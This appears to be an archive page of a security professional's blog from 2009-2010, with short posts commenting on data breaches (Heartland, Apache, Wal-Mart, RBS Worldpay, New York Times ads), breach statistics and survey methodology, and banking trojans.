22. May 2010 · Comments Off on Heartland settles with MasterCard for $41 million · Categories: Breaches, Legal · Tags: ,

DarkReading is reporting:

In a legal settlement over its 2008 security
breach, Heartland Payment Systems has agreed to pay up to $41.4 million
to MasterCard Worldwide and its card issuers to repay operational costs
and fraud losses attributed to the breach.

The article does not state whether this is included in the $139 million they said they set aside in a recent SEC filing. Given that the filing was recent, I would think, yes. As i posted earlier this month, $139 million is a far cry from the initial expected costs of $12 million.

17. April 2010 · Comments Off on Apache infrastructure breach analysis is a model of forthrightness and a learning experience · Categories: Breaches · Tags:

Last week, the Apache infrastructure team disclosed a breach to their issue tracking software where an XSS exploit led to root access which led to compromised passwords. What makes it interesting is the level of detail they provided about the breach, which security policies worked, which did not work, and what they are changing to reduce the risk of another such breach. No attempt at security by obscurity here. McAfee Labs did a nice blog post on it.

Do you think the use of Apache is going to go up or down? IMHO, the breach will have no effect or might actually increase Apache usage. The reality is that all organizations have breaches regularly. Sharing detailed information like this helps us improve our security.

BTW, if your organization is not experiencing breaches, it's due to lack of visibility.

20. February 2010 · Comments Off on Top two attack vectors – remote access applications and third party connections · Categories: Breaches, Research · Tags: , ,

Trustwave's recently published 2010 Global Security Report shows that the top two attack vectors, by far, resulting in breaches are Remote Access Applications and Third Party Connections. Here is the list of the top five:

> 95% Remote Access Application

> 90% Third Party Connection

> 15% SQL Injection 

> 10% Exposed Services

< 5% Remote File Inclusion

Clearly for each breach they investigated, there was more than one attack vector. It's also important to note that 98% of their investigations were on Payment Card Data breaches. No surprise since Trustwave is focused primarily on PCI compliance. The report does not indicate what percentage of the breaches occurred at organizations for which Trustwave was the QSA.

Regardless of these caveats, I believe it is worthwhile to note the total dominance of Remote Access Application and Third Party Connections.

It is imperative that organizations upgrade their firewalls to provide network segmentation (zoning) and to be able to recognize and control the use of most major application categories including Remote Access Applications.

Unfortunately you will have to register here to get the full report.

10. February 2010 · Comments Off on Insiders abuse poor database account provisioning and lack of database activity monitoring · Categories: Breaches, Database Activity Monitoring, Log Management, Security Information and Event Management (SIEM) · Tags: , ,

DarkReading published a good article about breaches caused by malicious insiders who get direct access to databases because account provisioning is poor and there is little or no database activity monitoring.

There are lots of choices out there for database activity monitoring but only three methods, which I wrote about here. I wrote about why database security lags behind network and end-point security here

Wired Magazine reported this week that Wal-Mart kept secret a breach it discovered in November 2006 that had been ongoing for 17 months. According to the article, Walmart claimed there was no reason to disclose the exploit at the time as they believe no customer data or credit card information was breached.

They are admitting that custom developed Point-of-Sale software was breached. The California Breach Law covering breached financial information of California residents had gone into effect on July 1, 2003 and was extended to health information on January 1, 2009. I blogged about that here.

I think it would be more accurate to say that the forensics analysts hired by Wal-Mart could not "prove" that customer data was breached, i.e., could not find specific evidence that customer data was breached. One key piece of information the article revealed, "The company’s server logs recorded only unsuccessful log-in attempts, not successful ones, frustrating a detailed analysis."

Based on my background in log management, I understand the approach of only collecting "bad" events like failed log-ins. Other than this sentence the article does not discuss what types of events were and were not collected. Therefore they have very little idea of what was really going on.

The problem Wal-Mart was facing at the time was that the cost of collecting and storing all the logs in an accessible manner was prohibitive. Fortunately, log data management software has improved and hardware costs have dropped dramatically. In addition there are new tools for user activity monitoring.

However, my key reaction to this article is my disappointment that Wal-Mart chose to keep this incident a secret. It's possible that news of a Wal-Mart breach might have motivated other retailers to strengthen their security defenses and increase their vigilance, which might have reduced the number of breaches that occurred since 2006. It may also have more quickly increased the rigor QSAs applied to PCI DSS audits.

In closing, I would like to call attention to Adam Shostack's and Andrew Stewart's book, "The New School of Information Security," and quote a passage from page 78 which talks about the value of disclosing breaches aside from the need to inform people whose personal financial or health information may have been breached:

"Breach data is bringing us more and better objective data than any past information-sharing initiative in the field of information security. Breach data allows us to see more about the state of computer security than we've been able to with traditional sources of information. … Crucially, breach data allows us to understand what sorts of issues lead to real problems, and this can help us all make better security decisions."

04. October 2009 · Comments Off on Canadian study reports breaches triple in 2009. Is this a valid statistic? · Categories: Breaches, Security Management · Tags: , , , ,

Earlier this week, Telus released the results of their 2009 joint Telus/Rotman School of Management at the University of Toronto study on Canadian IT Security Practices, which claimed that the number of breaches tripled to an average of 11.3. Here is the press release. But are these valid claims?

First, let's take a deeper look at the average of 11.3. By simply taking the raw answers of the 2009 question about the number of breaches during the last 12 months, the average, i.e. mean, is indeed 11.3. However, let's take a closer look at the actual responses:

Number of Breaches   Percentage of Organizations

0                                      14%

1                                        6%

2 to 5                                 33% 

6 to 10                                9%

11 to 25                              7%

26 to 50                              3%

51 to 100                            2%

More than 100                     2%

Don't know                          23%

Given the number of outliers, the average (mean) is not really a valid number. Those outliers significantly skew the average. The mode, between 2 and 5, is much more meaningful.

Also, there is no attempt to correlate the number of breaches an organization suffered with the organization's size. Of the 500 organizations participating, 31% had under 100 employees and 23% had over 10,000 employees. The point here is that the outliers may very well be a small group of very large organizations.

Now let's address the claim of "tripling." What could account for this huge increase?

  1. It may just be a case of people being more honest this year, i.e. reporting more breaches. After all, this is just a survey.
  2. It may be that organizations actually have better security controls in place and therefore detected more breaches.
  3. It may be a function of the organizations participating. In 2008, there were only 297 versus 500 in 2009.
  4. It could be the change in the way the question was worded in 2009 versus 2008. Here is the question from 2008 (In fact the only place in the study that uses real numbers rather than percentages):

Q40. A major IT security incident can be defined as one which causes a disruption to normal activities such that significant time, resources, and/or payments are required to resolve the situation. Based on this definition, how many major security incidents do you estimate your organization has experienced in the last 12 months?

1 to 5             63%

6 to 10             2%

More than 10    1%

Don't know       24%

The 2009 study question:

Q48. How many Security breaches do you estimate your organization has experienced in the past 12 months?

I provided the responses earlier in this post. The point is that in 2008, the question specifically asked about major incidents while in 2009 the question was about all breaches.

Also note, in both cases the organizations were asked for "estimates." Don't most of these organizations have Security Incident Response Teams? At least the 69% with over 100 full time employees? Wouldn't they know exactly how many "incidents" they investigated and how many were actual breaches? 

I suppose studies like these, based on surveys, have some value, but we really need information based on facts and analysis based on sound techniques.

21. September 2009 · Comments Off on London TimeOnLine report on Clampi thin on facts · Categories: Breaches, Funds Transfer Fraud, Malware · Tags: , , ,

The London-based Times OnLine had a story today entitled, "New Trojan virus poses online banking threat." With all due respect, Mike Harvey, their Technology Correspondent, appears to have gotten a few things wrong as follows:

  • The headline is referring to the Clampi Trojan, which is not new. It was first discovered in 2006 according to McAfee and 2008 according to Symantec. In fact as late as July 23rd, Symantec classified Clampi as "Very Low" risk. Since then, Symantec has raised the risk level to "High."
  • The Clampi Trojan is just one of many trojans that cyber criminals are using to steal people's online banking credentials. What these trojans have in common is the keylogging capability, i.e. the ability to capture all of your keyboard clicks.
  • The real story is that sophisticated cyber criminals are focusing on stealing money directly out of small and medium business accounts.

For more details on Clampi and funds transfer fraud, see my earlier blog posts here and here respectively.

14. September 2009 · Comments Off on Two more high profile Web 2.0 exploits – NY Times, RBS Worldpay · Categories: Breaches, IT Security 2.0, Malware, Secure Browsing · Tags: , , , , , , , , ,

Two more high profile organizations have succumbed to Web 2.0 based exploits, New York Times and RBS Worldpay. These highlight the shortcomings of traditional IT security. I have no doubt that both of these organizations had deployed traditional firewalls and other IT Security tools, yet they were still breached by well understood exploit methods for which there are are proven mitigation tools.

I discussed this issue, Web 2.0 requires IT Security 2.0, at some length recently.

The current RBS Worldpay problem was merely a hacker showing off a SQL Injection vulnerability of RBS Worldpay's payment processing system. Late last year RBS Worldpay suffered a more damaging breach involving the "personal and financial account information of about 1.5 million
cardholders and other individuals, and the social security numbers
(SSNs) of 1.1 million people."

The New York Times website itself was not breached. A third party ad network vendor they use was serving "scareware" ads on New York Times site. Martin McKeay points out on his blog:

"it appears that the code wasn’t directly on a NYT server, rather it was
served up by one of the third-party services that provide ads for the
NYT.  Once again, it shows that even if you trust a particular site
you’re visiting, the interaction between that site and the secondary
systems supporting it offer a great attack vector for the bad guys to
gain access through."

On the other hand, the average user coming to the New York Times site is not aware of this detail and will most deservedly hold the New York Times responsible. Web sites that use third party ad networks to make money, must take responsibility for exploits on these ad networks. For now, as usual, end users have to protect themselves.

I recommend that Firefox 3.5 users avail themselves of Adblock Plus and NoScript. Adblock Plus obviously blocks ads and NoScript by default prevents JavaScript from running.

What's particularly interesting about NoScript is that you can allow JavaScript associated with the site to run but not the JaveScript associated with third party sites like advertising networks. Based on my reading of Troy Davis's analysis of the exploit, if you were using Firefox 3.5 and running NoScript with only New York Times JavaScript allowed, you would not have seen the scareware ad.